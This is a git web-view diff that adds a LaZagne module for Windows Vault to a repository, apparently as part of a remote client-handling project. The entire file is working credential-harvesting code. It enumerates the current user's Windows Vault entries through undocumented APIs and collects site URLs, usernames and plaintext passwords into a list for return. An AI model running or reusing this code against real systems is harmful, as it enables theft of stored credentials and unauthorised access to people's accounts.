summaryrefslogtreecommitdiff
path: root/foreign/client_handling/lazagne/softwares/windows/vault.py
diff options
context:
space:
mode:
Diffstat (limited to 'foreign/client_handling/lazagne/softwares/windows/vault.py')
-rw-r--r--foreign/client_handling/lazagne/softwares/windows/vault.py71
1 files changed, 71 insertions, 0 deletions
diff --git a/foreign/client_handling/lazagne/softwares/windows/vault.py b/foreign/client_handling/lazagne/softwares/windows/vault.py
new file mode 100644
index 0000000..9c8e8cc
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/windows/vault.py
@@ -0,0 +1,71 @@
+# -*- coding: utf-8 -*-
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import *
+from ctypes.wintypes import *
+
+
+class Vault(ModuleInfo):
+ def __init__(self):
+ ModuleInfo.__init__(self, 'vault', 'windows', only_from_current_user=True)
+
+ def run(self):
+
+ # retrieve passwords (IE, etc.) using the Windows Vault API
+ if float(get_os_version()) <= 6.1:
+ self.info(u'Vault not supported for this OS')
+ return
+
+ cbVaults = DWORD()
+ vaults = LPGUID()
+ hVault = HANDLE(INVALID_HANDLE_VALUE)
+ cbItems = DWORD()
+ items = c_char_p()
+ pwd_found = []
+
+ if vaultEnumerateVaults(0, byref(cbVaults), byref(vaults)) == 0:
+ if cbVaults.value == 0:
+ self.debug(u'No Vaults found')
+ return
+ else:
+ for i in range(cbVaults.value):
+ if vaultOpenVault(byref(vaults[i]), 0, byref(hVault)) == 0:
+ if hVault:
+ if vaultEnumerateItems(hVault, 0x200, byref(cbItems), byref(items)) == 0:
+
+ for j in range(cbItems.value):
+
+ items8 = cast(items, POINTER(VAULT_ITEM_WIN8))
+ pItem8 = PVAULT_ITEM_WIN8()
+ try:
+ values = {
+ 'URL': str(items8[j].pResource.contents.data.string),
+ 'Login': str(items8[j].pUsername.contents.data.string)
+ }
+ if items8[j].pName:
+ values['Name'] = items8[j].pName
+
+ if vaultGetItem8(hVault, byref(items8[j].id), items8[j].pResource,
+ items8[j].pUsername, items8[j].unknown0, None, 0,
+ byref(pItem8)) == 0:
+
+ password = pItem8.contents.pPassword.contents.data.string
+ # Remove password too long
+ if password and len(password) < 100:
+ values['Password'] = password
+
+ pwd_found.append(values)
+
+ except Exception as e:
+ self.debug(e)
+
+ if pItem8:
+ vaultFree(pItem8)
+
+ if items:
+ vaultFree(items)
+
+ vaultCloseVault(byref(hVault))
+
+ vaultFree(vaults)
+
+ return pwd_found
generated by cgit v1.2.3 (git 2.39.1) at 2024-09-16 19:53:27 +0000